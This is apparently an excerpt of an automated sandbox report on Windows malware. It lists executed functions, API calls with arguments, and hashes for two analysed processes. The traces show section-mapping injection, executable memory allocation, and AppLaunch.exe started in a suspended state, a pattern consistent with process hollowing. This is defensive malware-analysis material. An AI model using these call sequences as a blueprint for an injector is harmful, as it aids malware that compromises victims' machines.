Instruction Fuzzy Hash: 5501A276A106048FDF21DF24C894BAE33E5EB86316F4544B5D90BE7281EBB4A9428F90

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: vahvrsuPID: 5980, Parent PID: 1044COMMON

Execution Graph

Execution Coverage:	6.3%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	0%
Total number of Nodes:	98
Total number of Limit Nodes:	4

Executed Functions

Function 00401590 Relevance: 10.7, APIs: 7, Instructions: 203
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction ID: d6964195f2ae178c179c3b7a32e304a619fe45f2cb2dcf097c8130f3d204b23e
Opcode Fuzzy Hash: 569c601533bfa5fc76acd0aceccd82dced2ec0ba9158162e35254d0d933d7b6e
Instruction Fuzzy Hash: 64616FB0904205FFEB208F91CC58FAF7BB8EF81710F10416AFA12BA1E5D6749941DB65

Uniqueness

Uniqueness Score: -1.00%

Function 0040159B Relevance: 10.7, APIs: 7, Instructions: 173
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction ID: ff81ed2e81490e93a7bfe721f9c6a4d9304ec08e35c355afa89281eda0ffd623
Opcode Fuzzy Hash: bae20a228bd41bc7813985564ad54ad8a6399e0ad18c72377fec9941621639a0
Instruction Fuzzy Hash: 3E5109B5900249BFEB208F91CC49FAB7BB8FF85710F144169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015B0 Relevance: 10.7, APIs: 7, Instructions: 169
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction ID: af686ae4933c2f6004de28669cc23aaadd0110c3f88d1b974755b8c34b4799b2
Opcode Fuzzy Hash: 6c4736dca5741fb18473fdef31891e556f9b158cac04651ef2a3a7cb79a50736
Instruction Fuzzy Hash: 0E51F9B5900249BFEB208F91CC48FAF7BB8FF85B10F104169FA11BA2E5D6749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 004015BC Relevance: 10.7, APIs: 7, Instructions: 168
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction ID: 765dedf92b6036aea99e2596c7c6646b0bcbba97602321f23575c560d9e65fb8
Opcode Fuzzy Hash: 72661907227a9452eb25ab953c02bdcf5a827517e06e297a0d085dc110f4c5bf
Instruction Fuzzy Hash: 1451E8B5900249BFEF208F91CC48FDF7BB8FF85B10F104169FA11AA2A5D6749945CB64

Uniqueness

Uniqueness Score: -1.00%

Function 004015CB Relevance: 10.7, APIs: 7, Instructions: 164
nativeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004), ref: 004016B6
NtCreateSection.NTDLL(?,0000000E,00000000,?,00000040,08000000,00000000), ref: 004016F7
NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401728
NtMapViewOfSection.NTDLL(?,?,?,00000000,00000000,00000000,00000000,00000001,00000000,00000020), ref: 0040174A

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$View$Create$DuplicateObject
String ID:
API String ID: 1546783058-0
Opcode ID: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction ID: 60f1a669064b898f2f8cfe764b4cdaf5e199705ebcb5ef48edc51869d28594cd
Opcode Fuzzy Hash: 004f83838c091370c792dd4fcb680897e20f1790ca1ffba750393c7614aa26f8
Instruction Fuzzy Hash: 2C51FAB1900249BFEF208F91CC48F9FBBB8FF85B10F104169FA11AA2A5D7749941CB24

Uniqueness

Uniqueness Score: -1.00%

Function 02B3003C Relevance: 11.0, APIs: 4, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000004), ref: 02B3024D

Strings

cess, xrefs: 02B3018D
kernel32.dll, xrefs: 02B3008F, 02B30095

Memory Dump Source

Source File: 00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b30000_vahvrsu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: e139e3e64bde16b0c2697e1cffb660233c7838f475c4ea58c66bade7c6b341a0
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 38527975A01229DFDB65CF58C984BACBBB1BF09304F1484D9E94DAB351DB30AA85CF14

Uniqueness

Uniqueness Score: -1.00%

Function 02BA75C1 Relevance: 3.0, APIs: 2, Instructions: 41
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateToolhelp32Snapshot.KERNEL32(00000008,00000000), ref: 02BA75E9
Module32First.KERNEL32(00000000,00000224), ref: 02BA7609

Memory Dump Source

Source File: 00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2ba0000_vahvrsu.jbxd

Yara matches

Similarity

API ID: CreateFirstModule32SnapshotToolhelp32
String ID:
API String ID: 3833638111-0
Opcode ID: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction ID: 6c098ff55e79c56194a2d623ea8dc17413c5de3fb10709bc8be32883875a17be
Opcode Fuzzy Hash: 3788706d20f5b898e185810e19a2e38a50b9b544ac306a9cd33eedd6d527d18a
Instruction Fuzzy Hash: FFF096321087107FD7203BFDAC9CBAEB6ECEF49725F1006A9E642910C1DF71E8459A61

Uniqueness

Uniqueness Score: -1.00%

Function 02B30E0F Relevance: 3.0, APIs: 2, Instructions: 15
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetErrorMode.KERNELBASE(00000400,?,?,02B30223,?,?), ref: 02B30E19
SetErrorMode.KERNELBASE(00000000,?,?,02B30223,?,?), ref: 02B30E1E

Memory Dump Source

Source File: 00000005.00000002.2104229521.0000000002B30000.00000040.00001000.00020000.00000000.sdmp, Offset: 02B30000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2b30000_vahvrsu.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: b393aa49048c9d9ba921cb1c227b0660e979d90b01732ef70eaeff1ab3f32afd
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: CCD01232645228B7DB013A94DC09BCEBB5CDF09BA6F008461FB0DE9080CBB09A4046EA

Uniqueness

Uniqueness Score: -1.00%

Function 004029BA Relevance: 1.6, APIs: 1, Instructions: 60
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction ID: ddfd821467dba8d9e3be05996510f596060048204c77d2b9bdf6330f9e046059
Opcode Fuzzy Hash: 8b4368bb53e1649655da800b8e3771367f61da053ffbe47dde7c34dc5595736a
Instruction Fuzzy Hash: 5C11E571708104E7D6209A449B4EF6B3724AB50B00F308077E5077A1C0D9FD9A07BBAF

Uniqueness

Uniqueness Score: -1.00%

Function 004029C5 Relevance: 1.6, APIs: 1, Instructions: 55
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction ID: eda82e36109819710fc28ef01b941f30aa1b457bd77d6c907d6690057fca41fa
Opcode Fuzzy Hash: 630f67e63f4c9d6cadc1f4ef28869250e9dd95ac73f78134dda1cef590dfe083
Instruction Fuzzy Hash: 3C01C471708205E7DA60DA949A4EB6B7710AB51B10F308077E5037A1C4DAFD9A07FB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029D1 Relevance: 1.6, APIs: 1, Instructions: 54
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction ID: 27f311fed6bd4bb195386d6e886048742e5b6b48a655c0a394e70793ed6bf28f
Opcode Fuzzy Hash: 8aebd7c2dfb35844096bdf04bcf18f9291abc38b44631a4f8f553a04b448b611
Instruction Fuzzy Hash: E0018071708105E7DA609A449B4EB6B7324BB50B10F308477E5077A1C4DAFD9A07BB6F

Uniqueness

Uniqueness Score: -1.00%

Function 004029D5 Relevance: 1.6, APIs: 1, Instructions: 51
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction ID: 6c082c2f6db60d75b034223dafbed04b71575a1e0537fab93527f59567f6cb96
Opcode Fuzzy Hash: 14f9d75437b26c4e33ab762a249f6d4a6897a4cf10a17b4738070ea496484bd2
Instruction Fuzzy Hash: DB01B531708105E7DB60DA409A4DF5F7720BB50B10F208577E5077A1C4DAF99A17EB9B

Uniqueness

Uniqueness Score: -1.00%

Function 004029E2 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction ID: daf8977218c418413866257df5c9087131837fd98e0c4230724de407841e0162
Opcode Fuzzy Hash: b2d371f82e3e545a267ab12f2e2f0a58ec4b54f775fd64736b106f9591d7a7c3
Instruction Fuzzy Hash: 3801DF31708104E7DB209A848A4DB5E7320AB40B10F208577E507BA1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 004029E9 Relevance: 1.5, APIs: 1, Instructions: 47
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction ID: 5524fd7572365f35614fa46947343296b9db081daee3b4d0816b59f029c0b045
Opcode Fuzzy Hash: 9850a57f899f03cbeedeed8d531e786c982b6ed5f0a372be87f463e87495e5bd
Instruction Fuzzy Hash: 2101A731704104E7D7209A448A4EB5E7720AB40704F208477E5067A1C4DAB9EA07AB6B

Uniqueness

Uniqueness Score: -1.00%

Function 004029F9 Relevance: 1.5, APIs: 1, Instructions: 45
libraryloaderCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LdrLoadDll.NTDLL(00000000,00000000,?,?), ref: 00402A18

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Load
String ID:
API String ID: 2234796835-0
Opcode ID: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction ID: 2a527b723104a8d4642483acce18f9de5ed6d5a74c4e47f32731208c7d716ef4
Opcode Fuzzy Hash: 83fdb88ab79b739a001a2e8c05ea2e4136fbf27434a3016a2f3de2c8c28590ed
Instruction Fuzzy Hash: 1801A231708104E7DB209A849A4DF9F7720AB40B14F208477E5027A1C0DAF9AA07AFAB

Uniqueness

Uniqueness Score: -1.00%

Function 00401969 Relevance: 1.3, APIs: 1, Instructions: 62sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction ID: 1276e484f00ba66cbffb4616bb4d5d076efec51046982770477825c9afbd6400
Opcode Fuzzy Hash: b8285f967374eae4a3c51efe3ce59b098afe428af0dcb557450618fb68c9c18d
Instruction Fuzzy Hash: 0F01D2B6708205FADB005A949C62EBB3618AB41755F300637BA13B80F1C57D8513FA6F

Uniqueness

Uniqueness Score: -1.00%

Function 00401975 Relevance: 1.3, APIs: 1, Instructions: 55sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction ID: 0230620869f43b82b90ed4dddf49477c9f5c6c73dade890abd4ec4b7d4a8195a
Opcode Fuzzy Hash: 9a4c6db62cce5b151e284cc19e63a433146ff3755d8681b35f1a2b6972971a8e
Instruction Fuzzy Hash: 4801BCB6308205FADB005A949C62FBA3219AB84751F30053BB613BC0F1C53D8513FA2F

Uniqueness

Uniqueness Score: -1.00%

Function 0040197F Relevance: 1.3, APIs: 1, Instructions: 54sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction ID: 9a4b4ffd5ca22a672d673467c452b15ea5c40039b4ea8ded510267d200494456
Opcode Fuzzy Hash: 25088a1f844088f741a859eeb607afc94706ffd20a91742bc3d9f24c23efa0b5
Instruction Fuzzy Hash: 3A01B1B6308205FADB115A949C61A7A3319AB45711F30053BB613B80F2C53D8512FA1F

Uniqueness

Uniqueness Score: -1.00%

Function 00401986 Relevance: 1.3, APIs: 1, Instructions: 53sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction ID: 5a2bb716a64f0a1f1a6e426f0b200f3e6862a670896c4db1e76ea4af0659c5ba
Opcode Fuzzy Hash: f146987f8c0bf49c3ef7592727f3e0a51ae856d021a330616d03f7304a9c3b71
Instruction Fuzzy Hash: 3101DFB2308205FADB005AD49C62F7A3219AB85715F30453BB623B80F1C63D8512FB2F

Uniqueness

Uniqueness Score: -1.00%

Function 02BA7280 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNELBASE(00000000,?,00001000,00000040), ref: 02BA72D1

Memory Dump Source

Source File: 00000005.00000002.2105121877.0000000002BA0000.00000040.00000020.00020000.00000000.sdmp, Offset: 02BA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_2ba0000_vahvrsu.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: a2e8726c4558a6f159ee8c5afbac669463d689db99b3cf64fc7d35afae0a48ea
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: 28112A79A44208EFDB01DF98C985E98BBF5AB08351F0580A4F9489B361D771EA50EF80

Uniqueness

Uniqueness Score: -1.00%

Function 004019A2 Relevance: 1.3, APIs: 1, Instructions: 47sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction ID: 689da8ed0bf63c85a60a16fbbe407e4b0918199af58fa2149c0a58fdfe32668e
Opcode Fuzzy Hash: a8f77c5b0aafc3a83b6e9a89fc0125d54fce9978fbcf9d902b8238b221feffd7
Instruction Fuzzy Hash: 0E0181B6308105FADB115AD49D52FBA3719AB45751F30453BB613B80F2C53D8512FB2B

Uniqueness

Uniqueness Score: -1.00%

Function 00401992 Relevance: 1.3, APIs: 1, Instructions: 46sleepCOMMON

Download Yara Rule

APIs

Sleep.KERNELBASE(00001388), ref: 004019B4

Part of subcall function 00401590: NtDuplicateObject.NTDLL(?,000000FF,000000FF,?,00000000,00000000,00000002), ref: 00401648
Part of subcall function 00401590: NtCreateSection.NTDLL(?,00000006,00000000,?,00000004,08000000,00000000), ref: 00401675
Part of subcall function 00401590: NtMapViewOfSection.NTDLL(?,000000FF,?,00000000,00000000,00000000,00000000,00000001,00000000,00000004,?), ref: 00401698

Memory Dump Source

Source File: 00000005.00000002.2101810568.0000000000400000.00000040.00000001.01000000.00000005.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_400000_vahvrsu.jbxd

Similarity

API ID: Section$CreateDuplicateObjectSleepView
String ID:
API String ID: 1885482327-0
Opcode ID: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction ID: 9477092311c163758adf26378a137d016a4cc75b4861da4fd192d9fcf75081b0
Opcode Fuzzy Hash: 994369af4d0fa0c447a21c659804c9e18bb6abd6db9e85dcf8f049b878b9c4ba
Instruction Fuzzy Hash: 25016D72304105FADB119AD09C52EAA3729AB48355F30457BB613BD0F2C63D8552EB2B

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: 41CD.exePID: 2416, Parent PID: 2580COMMON

Execution Graph

Execution Coverage:	5%
Dynamic/Decrypted Code Coverage:	0%
Signature Coverage:	3.1%
Total number of Nodes:	2000
Total number of Limit Nodes:	51

Executed Functions

Function 00141A90 Relevance: 21.2, APIs: 10, Strings: 2, Instructions: 210
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessW.KERNELBASE(C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe,00000000,00000000,00000000,00000000,00000004,00000000,00000000,00000044,?), ref: 00141B65

Strings

D, xrefs: 00141B34
C:\Windows\Microsoft.NET\Framework\v4.0.30319\AppLaunch.exe, xrefs: 00141B60

Memory Dump Source

Source File: 00000007.00000002.2167585539.0000000000141000.00000020.00000001.01000000.00000007.sdmp, Offset: 00140000, based on PE: true

Associated: 00000007.00000002.2167552941.0000000000140000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167621277.000000000015D000.00000002.00000001.01000000.00000007.sdmpDownload File
Associated: 00000007.00000002.2167654075.000000000016A000.00000004.00000001.01000000.00000007.sdmpDownload File
